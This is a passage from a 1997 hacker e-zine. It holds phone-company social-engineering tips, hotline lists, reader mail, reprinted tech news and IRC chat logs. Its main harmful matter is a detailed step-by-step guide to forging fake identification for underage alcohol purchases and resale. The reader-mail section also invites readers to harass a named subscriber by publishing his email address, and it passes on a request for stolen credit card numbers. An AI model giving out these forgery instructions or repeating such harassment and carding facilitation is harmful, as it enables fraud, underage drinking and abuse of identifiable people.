the main number and if they're not the employee locator, ask them for that number. In most cases, it's given to you, no questions asked. If you can't get the phone company's main number from directory asisstance, try calling the billing office and ask them. Below is a short list of numbers. Bell Atlantic (West Virginia)..........(304)-954-6202 Bell Atlantic (Virginia)...............(804)-225-6300 Cincinnati Bell (Ohio).................(513)-397-5775 South Central Bell (Jackson, Miss.)....(601)-961-1327 Southwestern Bell (Little Rock, Ark.)..(501)-373-9800 U.S. West (Western U.S.)...............(800)-879-4357 Ameritech (Indianapolis, IN)...........(317)-265-2266 Southern Bell (South Carolina).........(800)-336-0014 Pacific Bell (Los Angeles, CA).........(213)-339-6622 _____________________________________________________________ The Weather Report: Federal Hotline Numbers By: WeatherM ------------------------------------------------------- Department of Agriculture 1 800 424 9121 Department of Defense 1 800 424-9098 Environmental Protection Agency 1 800 424-9346 Department of Health and Human Services 1 800 368-5779 Department of Housing 1 800 669-9777 Railroad Retirement Board 1 800 772 4258 Small Business Administration 1 800 827 5722 Social Security Administration 1 800 772 1213 Department of Veterans Affairs 1 800 827 2039 Federal Emergency Management Agency 1 800 638 6620 Federal Job Information 1 202 606 2700 ------------------------------------------------------- Have fun you little boogers. Contact Info weatherm@beer.com weatherm@thepentagon.com www.surfsouth.com/~weatherm/ _____________________________________________________________ Fake IDs by N-TREEG This article is for all of you out there that's ever wanted to make yourself a fake ID. THTJ brings you a quick and easy method. Note, these type of ID's won't get you into a club, nor will they get you alcohol from a major liquor store that scrutinizes ID's closely. These will get you alcohol at a grocery store if a teenage cashier asks you for some id while you're buying that bottle of wine cooler (or rum I luv rum!). Shall we begin? All righty... MATERIALS Okay you're gonna need a few things. Here's what you'll need: 1) A computer and a printer, preferably inkjet or laser. 2) Transparencies that are suited to work with your type of printer. Some regular white (or colored/patterned) printer paper would be nice too. 3) An index card. 4) A small laminating machine. You can pick these up from Office Depot for about $49. Split the cost with some friends. Or if you're gonna be selling ID's it'll eventually pay for itself. 5) Laminating pouches to use in the laminating machine. These don't usually come with the laminating machine. Don't forget to pick some up. Also found at Office Depot. 6) Colorful paper currency from a foreign country. Go to your local bank and ask to purchase some paper bills from maybe a Caribbean island or something. They usually have nicely colored paper money. Something with green, yellow, orange, tan, or red works well. Make sure the money has some sort of government seal on it. 7) A good picture of yourself. When you take the picture, make sure you are in front of a solid colored background. It wouldn't fool anyone if you use a picture of yourself taken in front of a brick wall. Try to take the picture in front of a solid colored wall or curtain. MAKING THE ID Okay now that you've gathered your necessities, it's time to go to work. First you want to make your info sheet with your computer. In a word processor, make a box about the size of a drivers license with the info you want to appear on your id. Include a name, address, identification number, birthdate, etc. etc. Make sure you leave space to the left for a picture to go. Now print up the sheet on a transparency and cut it out. Lay your transparency over the paper money. Get the idea now? The paper money makes a great background. Slip your picture in between the transparency and the paper money background in the spot you left empty for the photo. Doesn't that look great? Well almost. The side with the picture on it is thicker isn't it? That's what you use the index card for. Cut an index card in the shape of the id minus the amount of space the photo takes up. Now place the index card behind the paper money and the whole thing should be about equal depth. Now go back to your computer and print out some stuff for the back of your id. Make a little box with the caption "thumb print" if you like, then you can stick your thumb in an ink pad and put your thumb print in the box to make the id look more authentic. Also put up some stuff about blood type. Make a rectangular box at the bottom for a signature. At the top put up a heading with something similar to "PROPERTY OF THE ISLAND OF BARBADOS U.S. Embassy" or some b.s. like that. Do whatever comes to mind with it. Print it out on your regular white computer paper (or you can go for that patterned paper they sell at office depot). Cut it to size and attach it to the back of the id with the index card sandwiched between the white paper and the paper money. Once you're satisfied with the way your id is laid out, follow your laminiator's instructions to seal your id in plastic. Make sure the edges are smooth and rounded and try not to let any air-bubbles gather in your laminated id. You've now got yourself a pretty cheesy id. But hey, sometimes they work. A good friend of mine uses his all the time at a gas station to buy beer. They are also helpful if you go on cruises to places like say.....Cancun! where they _really_ don't care how old you are, but you still gotta have some kind of ID. Here's a few suggestions and add-ons for your id. When making your transparency, make a copy of the government seal off of the paper currency. Incorporate that into your transparency to make it look more authentic. I personally don't know where to get holograms made or how to incorporate them. For something similar, try to get some of that "rainbow" like paper they use in gift baskets...the kind that change colors and shimmers when you reflect light off of it. Put some of that behind the seal to make an illusion of a hologram. You can also try reflective tape (by 3M), I don't know how well that will work. It's up to you to experiment. Have fun, and play nicely! Special thanks to SirRob for introducing me to the concept. And remember, HaX0r3d PerceptionS leases .... THTJ ownz! N-TREEG HaX0r3d PerceptionS http://www.afn.org/~afn56746 Shouts to the UF crew; HBS and THTJ; #'s phreak, 2k, & area66 on the undernet; PADmaster & speed1 _____________________________________________________________ Oddville, THTJ - from the demented e-mail send to Scud-O Once again, it is time for some of the oddest, craziest, and stupidest e-mail that gets sent to me every month.. so on with the show! Again, if i reply to an e-mail, the reply is inside the brackets. --- To: scud@thtj.com Subject: i am a leet hax0r 3y3 w45 w0n3r1ng 1f y0u w3r3 3v3r g01ng t0 d0 4ny w4r3z 4rt1cl3s. mY 0-d4y s1t3 l15ts 4r3 0uT 0f d4t3 4nD y0u 4r3 r34lly l33t! w3 sh0uld f0rm a l33t hax0rs 0nly gr0up 4nd tr4d3 w4r3z#!@#$@#$@#@#$@#% 3m4il m3 b4ck wi7h s0m3 si7e liSt AnD yOuR RePly tO hAxOrInG#$@$%^@#%$@$#^ acidburn@aol.com [ umm, sorry 'acidburn' but i just cant read your 'ereet' text. i can not understand what you are saying, sorry. ] --- Subject: Hi Date: Thu, 10 Jul 97 06:26:25 +0000 From: MegaBrat13@aol.com To: FoxMulder@worldnet.att.net So where can I get havoc the program? [ wtf? ] --- Date: Tue, 22 Jul 1997 01:37:21 -0700 From: Joe Roebuck <xei33@dial.pipex.com> To: scud@thtj.com Subject: (no subject) X-URL: ftp://guest:macwarez@207.16.248.126/darkdajimbo/pages/kewl.htm while scouring the net for elite hackers to join power empires ELITE FACTION - your name got mentioned... if you would like to be part of an elite faction of hackers/crackers/virii etc then please reply to this message at xei33@dial.pipex.com. If you are on here accidently then ignore this message and if you are already in power empire ignore this message, otherwise hit return and join the elite faction. Power empire has over 600 members and 6 different factions, the King is looking to set up an elite faction and has been looking for worthy members, your naem has come up..... if your interested mail the king at xei33@dial.pipex.com [ 10 minutes of laughter.......... ] [ 10 more minues of laughter ....... ] --- Subject: password cracking Date: Wed, 23 Jul 97 18:02:05 +0000 From: "KeViN TRaViS" <just4kevin@hotmail.com> To: mcoyle@sirinet.net CC: FoxMulder@worldnet.att.net [KFF got this one too] i have a problem that only a hacker can solve. i just moved out and my father gave me his computer, complete with his internet account. the problem: he left blocks to certain web sites that i don't know the password to (you know those RSACi blocks?). how can I get through these blocks and/or crack his password. :lestat ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com [ look, little underage kiddies should not be looking at porn. shame on you. ] ---- Subject: Mailing List Date: Mon, 14 Jul 97 04:06:29 +0000 From: SickboyJR@aol.com To: Scud-O can you please put me on the mailing list? send the journal to: danishiqbal@juno.com [ DAMNIT! I THOUGHT I TOLD YOU PEOPLE TO STOP USING MY OLD E-MAIL ADDRESS!!!!, to teach you a lesson, im not gunna cover up yer e-mail, so you readers, feel free to abuse this aoler. ] --- Subject: mailing list Date: Mon, 14 Jul 97 22:51:56 +0000 From: PsYcHoFaZe@aol.com To: Scud-O can i join your mailing list's? my e-mail address is psychofaze@aol.com [ read above ] --- Subject: thtj.com Date: Mon, 14 Jul 97 04:44:25 +0000 From: psych0 To: <Scud-O> it doesn't work. i cannot access your server. netscape just sits there and times out, and if i set ping to send 20 packets, only about 2 or 3 come back, the rest time out. what's up with this? aren't you paying a bit of money for this? i think it's time to give nethosting.com a nasty letter.... [ i agree, i agree. nethosting www server is fine, but every other server is totally fucked up... oh well.... cant wait to move.... ] --- Subject: Subscribe to THTJ Date: Sun, 13 Jul 97 06:53:47 +0000 From: AbrAxaS <abraxas@internetwis.com> To: Scud-O Hey, can ya hook me up with the current THTJ and any back issues available. I'd appreciate it and may be interested in submitting for future editions. Thanx, take 'er easy. -=] AbrAxaS [=- [ look, to you and the 500 other people who ask me this question each month, i DO NOT HAVE THE TIME to send you every issue of thtj. if i did, all i would do in life is send out thtj - since it would be a 24/7 job. go download it yerself ya bum. ] --- Subject: Web Ring Date: Thu, 17 Jul 97 17:54:07 +0000 From: "X-human" <X-human@inil.com> To: <Scud-O> X-human here I was woundering if you wanted to be in my web ring called Phreakz "R" Uz. A new Web Ring. I am looking for good phreaking pages that are phone losers of america, prank, or just plain phreaking.I like your page and wounder if you want to join my ring please droop me a line if you do. Thank you for your time. \ / \ / \ / \/-}{ⁿ/\/\σ/\/ ;P /\President of Bad Taste Inc. Phreaks "R" Us corp. / \Creativeity Board of Directors for the Who / \Ring Master of the Phreakz "R" Uz Web Ring / \Ring Master of the Made in NotePad Web Ring [ i really dont go for web rings, but i may start doing so, if i do i will join up woth you. i posted your e-mail in case any of the readers want to join with you. i hope you dont mind. ] --- Subject: unabomber Date: Sun, 13 Jul 97 05:01:43 +0000 From: phett <weasel@bluemoon.net> To: Scud-O hey, is unabomber from the wester ny area? i'm in need of some local folk's to relate shit to. let me know if you can find out. phett [ no, he's not from ny. where he is from, i will never tell. ] --- Subject: HELP Date: Tue, 15 Jul 97 15:05:30 +0000 From: "apiter@usa.net" <apiter@usa.net> To: Scud-O I'm Sorry i badly write as to English. I from Russia Saint-Peterstburg. Help please to me need real number credit card for registration IBM global Network. My E-Mail: apiter@usa.net Big Thanks [ i dont card myself, now i would normally mock you for carding because it is stupid,but, since you are a Russian Comrade, i posted your e-mail incase one of our readers can help you out. i hope one of them does. ] --- Subject: D-Con Date: Wed, 16 Jul 97 17:37:11 +0000 From: xxxxxxxx <xxxxxxxx@xxx.net> Reply-To: x.x.xxx@xxxx.xxx.net, xxx@xxxx.xxx.net, xxxx@xxxx.xxx.net, xxxxxx@xxxx.xxx.net, xx.@xxxx.xxx.net, xxxxx@xxxx.xxx.net Organization: - To: Scud-O Hey did you go to the Con in Vegas if so Email your deal at xxxxxxxx@xxx.com or xxxxxx@xxxxxxxxx.net im doing a piece for a movie the pusuit of cyberculture-- get to me [ dont make me laugh.... ] --- Subject: nice Date: Tue, 15 Jul 97 19:53:39 +0000 From: BlueBox868@aol.com To: Scud-O I really learned a lot from your page man. I loved it. You need to E mail me sometime so that we can talk about phreaking or hacking. See ya man. In case your wondering 18/M here, [ um, i wasnt wondering, and i dont care about yer aol a/s checks. and if you want to talk phreak, e-mail me, im sorry but my life is too busy to just start talking with complete strangers. ] --- Reply-To: "Cracker" <cracker@waymark.net> From: "Cracker" <cracker@waymark.net> To: <scud@thtj.com> Date: Sun, 20 Jul 1997 09:58:54 -0500 X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE Engine V4.71.0544.0 Join the power empire---visit us to learn more about us at http://homepages. waymark.net/~cracker/ [ ummm.... wtf? ] --- Date: Sun, 27 Jul 1997 18:07:47 -0400 From: Spooky <spookyy@erols.com> Organization: Probably hiding somewhere in the shadows...clutching her modem. To: bertoli@australia.net.au, acid@smtp1.erols.com, frogy@aol.com, actionman@thepentagon.com, "@actmatrix"@gnn.com, kblue@ziplink.net, jmfoster@mtu.edu, acidhack@smtp1.erols.com, 0@aol.com, alex@is-bremen.de, ailurophilia@psynet.net, archum55@aol.com, Mistryx@ix.netcom.com, babygoat@usit.net, badboy@cei.net, bernies@2600.com, big_mac@pacific.net.sg, Black_So_6@hotmail.com, bob@sitecraft.com, borison@ibm.com, oblivion@10pht.com, bbuster@succeed.net, lychees@bellsouth.net, mindcocaine@hotmail.com, phreak@deathsdoor.com, qdgh09b@prodigy.com, cracked@primenet.com, ChAos@smtp1.erols.com, 1021@aol.com, carzydevil@geocities.com, yczn98a@prodigy.com, cyberchaos@geocities.com, bstock@cris.com, fist@ping.at, viviana1@idt.net, arctcfox@warwick.net, darkdajimbo@northeast.demon.co.uk, damage@idt.net, zpvg33a@prodigy.com, scud@thtj.com, dasxdeath@aol.com, 2rump@flash.net, nomad@imagin.net, steven20steven@juno.com, deathhead@pointbrk.erkware.com, demaxxus@usa.net, christopher_mewhort@sunshine.net, djgad@aol.com, qfwg61a@prodigy.com, DolphinBoy@juno.com, blizzardskick@worldnet.att.net, dzca66a@prodigy.com, exilesquid@earthlink.net, lordfaust@mailcity.com, wysiwyg@netwestonline.com, wicket@slip.net, bc@koan.com, bassin@worldnet.att.net, faheem@innotts.co.uk, tempest30@aol.com, draco@lords.com, goncalves@process.com, hackers24@hotmail.com, stormn@wave.co.nz, krees@downeast.net, snake7@swbell.net, hotheazip@aol.com, shvostov@accesscom.com, howthehel@aol.com, icefx@idt.net, in@smtp1.erols.com, quotes@aol.com, illusionz@mail.geocities.com, jjd@netcomuk.co.uk, trifraug@mscomm.com, KoDiaK@hotmail.com, kripto@hotmail.com, kwantam@mailhost.net, icowart@sprintnet.com, Ryder@sisna.com, xebec@juno.com, lordsome@cris.com, lumpster@aol.com, Mad_hacker@juno.com, mage2@earthlink.net, commodore64@geocities.com, mnikon@sundial.net, patrickbc@freemark.com, georgina@linknet.net, melvyn@mbwa.demon.co.uk, metl2rhcp@aol.com, moroni@scranton.com, muardib@freemark.com, mudge@10pht.com, dravis@mdc.net, necroman@juno.com, prophet9980@pacbell.net, powder@bright.net, butler@tir.com, k0p@iti2.net, ovrsoul@main.com, mcoyle@sirinet.net, phantom2000@msn.com, mark@panicx.com, phreak@megalink.net, a666@smtp1.erols.com, cool@aol.com, tedphreak@aol.com, hchitten@sprynet.com, psykon@hotmail.com, stuartlock@intonet.co.uk, revelation@mindspring.com, roma@loop.com, rowboat@telis.org, emiley@cae.wisc.edu, shadout@smtp1.erols.com, xx@aol.com, chriss@burgoyne.com, spacerog@10pht.com, sublime61@aol.com, mauricer@videotron.ca, sward@magicnet.net, ufc@chaos.gun.de, velocity@nym.alias.net, 81764205@cshore.com, vylent@hotmail.com, warman0@hotmail.com, msteen@postoffice.ptd.net, tmbg91@aol.com, jklh60a@prodigy.com, x1scythe@aol.com, zep@garbage.bridge.net, zillion@gatecoms.gatecom.com, zol@smtp1.erols.com, tar12@aol.com, hutcheson@btinternet.com Subject: Hackbook Most of the material thats in people's faces is anti-hack. They spend countless hours, pages, bandwidth, what have you, blabbing on and on about how evil the hacking society is. How addicted and destructive we all are. I'd like to change that. I want you to send me something about yourself and why you hack/phreak, your opinions on it. Be it an essay, a story, anything! i'm not picky. Though it must be done well. Spend some time on it. You're representing hackers/phreakers world round. You don't have to include your real name or any RL information about yourself. Just your handle, something to identify yourself by and I won't include your e-mail address if you don't want me to. It can be as abstract or as realistic as you like it but it has to be about YOU and some of the little episodes that people usually don't get a chance to experience and see. There's no page limit...the longer the better. Be as detailed as possible. NO LAMERS ACCEPTED! After this is done my main goal is to get this thing published. So, if you have any contacts, ideas, submissions, whatever, e-mail me: spookyy@erols.com The beginning deadline is October 31, 97. [ roflol!@#?@$@#!$#%!@$ ] _____________________________________________________________ -------------- --=[The News]=-- Compiled & edited by KungFuFox -------------- 1 : Snafu sets off chaos on Net Human error 2 : German Telco Pioneers Internet Telephony 3 : 3 Yemenis sue NASA for trespassing on Mars 4 : AOL Posts Sentry against Viruses <anonymous> why can't you bastards make some news? _____________________________________________________________ Snafu sets off chaos on Net Human error: E-mail blocked and Web sites vanish. By David L. Wilson and Elizabeth Wasserman, Mercury News Staff Writers A human error sent the global Internet into chaos Thursday, bouncing millions of e-mail messages back to senders and repeatedly informing users that their favorite Web sites simply did not exist. The cyberspace meltdown began in the early morning hours after a technician at Network Solutions Inc. in Virginia, which controls the Net's most important electronic directory of addresses, programmed the network's computers with incorrect data. Thursday's huge outage renewed concerns about the fragile underpinnings of the Internet, the global network of networks that is playing an increasingly critical role in commerce and communications. Employees of Network Solutions quickly sent out corrected address information to the Internet's computers, but the fix took hours to trickle down through all the systems used to route data in cyberspace. Intermittent outages continued throughout the day. While the garbling of the address database is not unprecedented, experts said the disruption was unusual because of its scope and persistence. "I don't think I've seen it this bad before," said Todd Stanford, an Internet consultant in San Jose who spent much of the day wrestling with problems caused by the outage. Network Solutions, which is responsible for administering the most popular "domain names," including those ending with .com, is also responsible for programming key computers on the Net used to route data. The addressing information is stored in the Domain Name Server system. When any kind of information -- whether electronic mail or a Web site address -- is sent out on the Net, the sender's local computers check with other computers, called servers, that are part of the Domain Name Server system, to ensure proper delivery. For example, if a person sends an e-mail missive to joe@internetprovider.com, the sender's system looks to the Domain Name Server system to see how the e-mail should be routed. Server hierarchy If the necessary address information can't be found on a local computer, that local server checks with another address server higher up the chain. The most important parts of the system are the top-level domain zone servers. There are nine of them, eight in the United States and one in Europe. In cases where the Internet routing computers get confused or don't know what to do next, they look to these top-level servers for instructions, and the top-level servers have final authority. It was while implementing one of the regular updates to the database on the top-level servers Wednesday night that an unidentified Network Solutions technician erred, the company said. A glitch in Network Solutions computers created bad information in files that the technician was preparing to transmit to the servers. The company has monitoring software that can spot such glitches, but the technician implemented the update despite the alert from the software, violating company policy. The result was that the database on the Net for two types of domains, those that end in .com and .net, was corrupted. Hopeless muddle The erroneous updates went out about 2:30 a.m. EDT Thursday, and slowly spread through the address system. By the time a corrected version of the file was distributed by Network Solutions about four hours later, much of the Internet's addressing mechanism was hopelessly muddled. "The Internet's never been as reliable as something like the phone system," said David Filo, co-founder of Yahoo, the Silicon Valley company that helps people search the Web. "Over the last few years, it's actually gotten better. At the same time, it's been growing so rapidly that in some sense, it's also gotten more fragile." "The people who are assuming that they are building on a stable infrastructure are in for some big surprises," said Eugene H. Spafford, head of a computer security lab at Purdue University. To Spafford, there was also a lighter side to the outage. "It was actually very pleasant. I went a whole day without getting any spam. I got a lot done and I'm thinking we may need to do this more often." Despite the explanation of human error, many observers suspected something more nefarious at work, perhaps a prank launched last week that may have gotten out of hand. Hijacking InterNIC Network Solutions operates an entity called InterNIC, under contract to the National Science Foundation, that handles registration of some of the most important domain names. On July 11, a group calling itself "AlterNIC," which objects to what it calls InterNIC's monopoly on registration of some domain names, hijacked the main Web address used to access InterNIC. InterNIC controls registration to the domain names .com, .net, .edu, .org, .gov and .mil. Rival companies such as AlterNIC have created their own categories of domain names, such as .biz, but those have not been as widely accepted on the Net, and not every Net user can reach sites that they register. Over the weekend, AlterNIC used a security flaw in many Internet computers to redirect Net users who tried to access "www.internic.net" to the AlterNIC site, in what the company described as a "protest." (Users could still get to the InterNIC from the AlterNIC site, or use InterNIC's alternate address, http://rs.internic.com/). "By redirecting the domain name `www.internic.net,' we are protesting the recent InterNIC claim to ownership of `.com,' `.org,' and `.net,' which they were supposed to be running in the public trust," said a letter from AlterNIC's Eugene Kashpureff, the chief financial officer, posted on the AlterNIC Web site. "Our apologies for any trouble this DNS domain name system protest has caused you." Kashpureff, in an interview, said the company ended the protest Monday morning, but as late as Thursday, some Net users were still being routed to the AlterNIC site when they tried to access InterNIC. Both Kashpureff and Network Solutions deny that his actions led to Thursday's problems. Others suspected a deliberate attack on the network's infrastructure, something that federal authorities have been sweating about for years. An FBI agent who agreed to comment on condition of anonymity said, "This is clearly one way of damaging the economic interests of this country, and we are looking at this incident, any such incident, for evidence that this is a deliberate act of sabotage. But we have no evidence at all to suggest that at the present time." Bill Orvis, a member of the Energy Department's Computer Incident Advisory Capability at Lawrence Livermore Lab, agreed. "It's not impossible that there is some kind of attack going on, but I think the odds of this one thing being an attack are low." ⌐1997 San Jose Mercury News _____________________________________________________________ German Telco Pioneers Internet Telephony (07/18/97; 6:30 p.m. EDT) By Douglas Hayward, TechWire FRANKFURT, Germany -- Internet voice telephony took a giant leap forward Friday when Deutsche Telekom became the first of the world's major telephone companies to launch an international trial of the fledgling technology. Deutsche Telekom, Europe's largest telecommunications carrier and Internet service provider, said it has begun piloting an Internet-based voice telephony service between the United States, Germany, Japan and Canada. The pilot, which involves customers using ordinary handsets rather than computers, will involve 1,000 users, mostly employees of multinational companies. "The targets of this project are to test the technology, to analyze the usage, and to evaluate whether Internet telephony can be offered at lower rates than conventional telephone service," Deutsche Telekom said in a statement Friday. The service will be restricted to selected regions, mostly large cities, within the four countries. Customers will use ordinary telephones to call a number in each country that routes their calls to an Internet "gateway." From the gateway, voice signals are compressed into digitized information "packets," which are transported across the Internet, using the TCP/IP protocol, to the gateway nearest the number they are calling. At this second gateway, the call is decompressed, and it re-enters the ordinary public telephone network as an seemingly ordinary telephone call. Deutsche Telekom will not charge pilot customers for the cost of carrying the call over the Internet nor for the cost of terminating the call over the public network. Instead, callers will only have to pay the cost of accessing the gateways, set at about 24 pfennings (13 cents) a minute û just under a fifth of the cost of a normal voice call from Germany to the United States. Analysts welcomed the announcement by Deutsche Telekom. "This is an interesting and creative move," said Andrew Clarke, an analyst at London-based telecommunications researcher Philips Tarifica. "It will be interesting to see how Deutsche Telekom charges for the full service. I would estimate very roughly that the full charge could be around 60 pfennings (33 cents) a minute, which is cheap but not so cheap that it's almost free," he said. Although the Finnish national telco announced an Internet telephony service several months ago, Deutsche Telekom is the first major telco to embrace the technology. Tarifica estimated in May this year that independent Internet voice telephony carriers would cost Deutsche Telekom, British Telecom and France Telecom a combined total of some $372 million per year by 2001. "The major telcos are all testing this technology, but it's an interesting and positive sign that it was Deutsche Telekom that was the first to come out into the open," said Cathy Burrows, a British-based analyst at researcher International Data Corp. "At the end of the day, pricing is going to be key. Every telco has to think very carefully about what their approach is going to be." Even at the rate of 60 pfennings, Deutsche Telekom will likely be undercut by independent carriers such as Hackensack, N.J.-based IDT, which is about to introduce handset-based Internet telephony for 10 cents a minute between Germany and the United States. "We can beat Deutsche on price and scope, and we think we can beat them on quality too," said Sarah Hofstepter, a spokeswoman for IDT. "It looks like Deutsche Telekom's pilot is being pitched as an alternative to [charge] cards and to call-back services rather than as a competitor to traditional telephony," Tarifica's Clarke said. "That shows Deutsche Telekom is using Internet telephony creatively." Many analysts said that the major carriers have no choice in the matter they have to embrace the Internet in order to control and contain it. "Deutsche Telekom has realized that it makes sense for you to get into Internet telephony early, so that if users are tempted to defect to voice telephony, they at least are tempted onto your service rather than onto someone else's," said Clarke. "If your throat is going to be cut anyway, why not do it yourself?" ⌐CMP Media, 1996. _____________________________________________________________ 3 Yemenis sue NASA for trespassing on Mars They say they inherited it 3,000 years ago July 24, 1997 WASHINGTON (CNN) -- No one expects to lose much sleep over it but, for the record, NASA has been sued by three men from Yemen for invading Mars. The three say they own the red planet, and claim they have documents to prove it. "We inherited the planet from our ancestors 3,000 years ago," they told the weekly Arabic-language newspaper Al-Thawri, which published the report Thursday. Adam Ismail, Mustafa Khalil and Abdullah al-Umari filed the lawsuit in San'a, Yemen, and presented documents to the country's prosecutor general which they say proves their claim. There was no word on whether they had paid the appropriate inheritance taxes. The claim is prompted, apparently, by the exploration of Mars by NASA's Pathfinder spacecraft and Sojourner rover, which have been sending back photos and data for analysis since early July. "Sojourner and Pathfinder, which are owned by the United States government, landed on Mars and began exploring it without informing us or seeking our approval," the men charge. They demand the immediate suspension of all operations on Mars until a court delivers a verdict. They also ask that NASA refrain from disclosing any information pertaining to Mars' atmosphere, surface or gravity before receiving approval from them, or until a verdict is reached. 'It's a ridiculous claim' "It's a ridiculous claim," NASA news chief Brian Welch told CNN Thursday after smothering a chuckle. "Mars is a planet out in the solar system that is the property of all humanity, not two or three guys in Yemen." Richard Cook, the Pathfinder mission manager at NASA's Jet Propulsion Laboratory in Pasadena, California, agreed. "It's everybody's," he said. "Mars is for the whole world to explore and to understand." Welch says a 1967 international treaty holds that everything in the solar system, except Earth itself, is the property of everyone in the world and no one country. "Just because we land on Mars first doesn't mean the United States owns it," he said. Welch said he thought the issue could get more serious in the future "when people actually are going to these places and the resources found have some value. ... More complicated issues will have to be resolved between countries, or between companies." Taking the opportunity to clear the air on another galactic real estate matter, Welch said he knew of no plans to take legal action against a man who has been selling deeds to property on the moon. Welch said the deeds are as worthless as the Yemenis' claims. "That's why they invented the phrase 'Caveat emptor' [Let the buyer beware]," he said. ⌐1997 CNN _____________________________________________________________ AOL Posts Sentry against Viruses by David Lazarus 12:08pm 30.Jul.97.PDT -- Those darn Trojan horses are still knocking at America Online's door, so the service introduced a new feature Wednesday intended to prevent members from letting a virus slip through the gates. The "Download Sentry" is an automatic warning that pops up each time an AOL subscriber attempts to download email attachments to his or her hard drive. "We have seen over the last several months an increasing number of Trojan horses, and more members downloading them," said AOL spokeswoman Tricia Primrose. "This is a real effort to educate members that there are files out there that can contain viruses." What these Trojan horses do is enter one's hard drive when an email attachment is activated, and then lurk in the shadows until the next time you log on to AOL. The virus then leaps forward, snatches your password and sends it back to a waiting hacker, who could, if so inclined, perpetrate all manner of mischief. Most Trojan horses cannot be spotted in advance by anti-virus programs. Tatiana Gau, AOL's vice president of integrity assurance, said "an increasing number" of members have actually activated Trojans. Often, the virus is masked behind enticing commands like GAMES.EXE, PORN.EXE, and PLAYBOY.ZIP. They also hide within add-ons for popular software titles, or in free screensavers. The new Download Sentry aims to remind AOL members of the danger. When an email message with an attached file is downloaded, a window pops up and says: "Warning! You are about to download a file which contains executable code. Downloading files from unknown sources might cause harm to your computing environment or display objectionable material. Do you wish to proceed?" If the answer is yes, members do so at their own risk. Those who don't need to be told twice have the option of switching off the alert. "The Download Sentry will help our members help themselves - by reminding them not to download email files sent to them from unknown sources," Gau said. ⌐1993-97 Wired Ventures, Inc. _____________________________________________________________ Logs - from the staff of thtj and our thtj readers... 1- zer0_hex.log - from Keystroke Session Start: Wed Jun 18 14:17:41 1997 <PcExpoKey> Hey =) <PcExpoKey> Are you the same Zer0-Hex who writes for that cool magizine thing? [14:18] <ZeR0-HeX> uh hi [14:18] -LineFeed- ))/allOps\#phreak-=> well i gotta go my brothaz........i have to do my night skewl algebra.......bye [14:18] <ZeR0-HeX> yeah i am <PcExpoKey> Cool <PcExpoKey> I like! [14:18] -digipimp-- ( Wa|| Ops: #phreak ) bye d00d <PcExpoKey> hehe [14:18] <ZeR0-HeX> who are you? <PcExpoKey> A loyal reader [14:18] -digipimp-- ( Wa|| Ops: #phreak ) oops...I'm slow [14:18] -digipimp-- ( Wa|| Ops: #phreak ) scuse me...I used to be retarded when i was 3 [14:18] -darkcyde- [BX-Wall/#phreak] really? you too!?!?! l33t! [14:19] -darkcyde- [BX-Wall/#phreak] i was retarded until yesterday! <PcExpoKey> You going to the PCexpo? [14:19] <ZeR0-HeX> um, where and when? [14:19] -digipimp-- ( Wa|| Ops: #phreak ) I was 3 yesterday too! <PcExpoKey> its in new york city <PcExpoKey> www.pcexpo.com [14:19] -darkcyde- [BX-Wall/#phreak] ELITE!!!!!!!!!!!!!!!!!!!!! [14:19] <ZeR0-HeX> i live in CT <PcExpoKey> :/ <PcExpoKey> Thats still pretty close <PcExpoKey> Where abouts in CT? <PcExpoKey> Im in Morris County NJ [14:20] <ZeR0-HeX> nobody knows [14:20] <ZeR0-HeX> just in CT [14:20] <ZeR0-HeX> are you going? <PcExpoKey> hehe <PcExpoKey> Yup <PcExpoKey> Its going to be cool [14:20] <ZeR0-HeX> age/sex? <PcExpoKey> On the east side or west side of ct? <PcExpoKey> 16/F <PcExpoKey> a/s? [14:21] <ZeR0-HeX> in CT [14:21] <ZeR0-HeX> i ain't telling [14:21] <ZeR0-HeX> 15/M <PcExpoKey> heh, ok <PcExpoKey> I understand <PcExpoKey> its raining here :/ [14:22] <ZeR0-HeX> here too <PcExpoKey> Its like quick rain though <PcExpoKey> Really hard and then it stops for a bit [14:23] <ZeR0-HeX> brb Session Close: Wed Jun 18 14:35:03 1997 Session Start: Fri Jun 20 14:42:13 1997 [14:42] <ZeR0-HeX> yeah [14:42] <ZeR0-HeX> hey [14:42] <ZeR0-HeX> sup <Keystrike> Hey :) <Keystrike> not much <Keystrike> pcexpo was ok [14:42] <ZeR0-HeX> oh [14:42] <ZeR0-HeX> kool <Keystrike> but, there wasnt anything new there or anything to phreak [14:42] <ZeR0-HeX> oh [14:42] <ZeR0-HeX> hehe <Keystrike> whats new? [14:43] <ZeR0-HeX> nothing much <Keystrike> You going to BeyondHOPE? [14:45] <ZeR0-HeX> uh [14:45] <ZeR0-HeX> never heard of it [14:45] <ZeR0-HeX> what is that? <Keystrike> its a hacker conference <Keystrike> www.hope.net <Keystrike> sponsered by 2600 mag <Keystrike> in nyc <Keystrike> hmm <Keystrike> Maybe you can talk there [14:46] <ZeR0-HeX> oh [14:46] <ZeR0-HeX> kewl <Keystrike> Whats Phreak 13 gonna be about again? [14:47] <ZeR0-HeX> when is it? [14:47] <ZeR0-HeX> i might be able to go [14:47] <ZeR0-HeX> huh? <Keystrike> August [14:47] <ZeR0-HeX> oh [14:47] <ZeR0-HeX> like *** Krusty is on IRC [14:47] <ZeR0-HeX> say if you get caught shoplifting.. [14:47] <ZeR0-HeX> i'll give you a hundred ways to get out of it <Keystrike> hehehe <Keystrike> cool ;) *** Krusty has left IRC <Keystrike> think you can make it there? <Keystrike> <speakers@hope.net>, if you're interested in speaking <Keystrike> thats their email addy <Keystrike> mail em! -> [ZeR0-HeX] PING <Keystrike> hello? [14:50] <ZeR0-HeX> one sec. <Keystrike> okay [14:50] <ZeR0-HeX> can't really talk man [14:50] <ZeR0-HeX> e-mail me [14:50] <ZeR0-HeX> you no my addres [14:50] <ZeR0-HeX> :-) [14:50] <ZeR0-HeX> cya later [14:50] <ZeR0-HeX> i might be able to go thoug' [14:50] <ZeR0-HeX> www.hope.net [14:50] <ZeR0-HeX> i'll check it out [14:50] <ZeR0-HeX> cya <Keystrike> k <Keystrike> cya :) [14:50] <ZeR0-HeX> k, cya [14:50] <ZeR0-HeX> nice talkin' with ya *** ZER0-HEX has left IRC Session Close: Fri Jun 20 14:52:00 1997 Session Start: Tue Jun 24 21:02:33 1997 [21:02] <ZeR0-HeX> um [21:02] <ZeR0-HeX> hi [21:02] <ZeR0-HeX> do i know you? <Keystrike> are u the zero hex who writes phreak magazine? [21:04] <ZeR0-HeX> hello? [21:05] 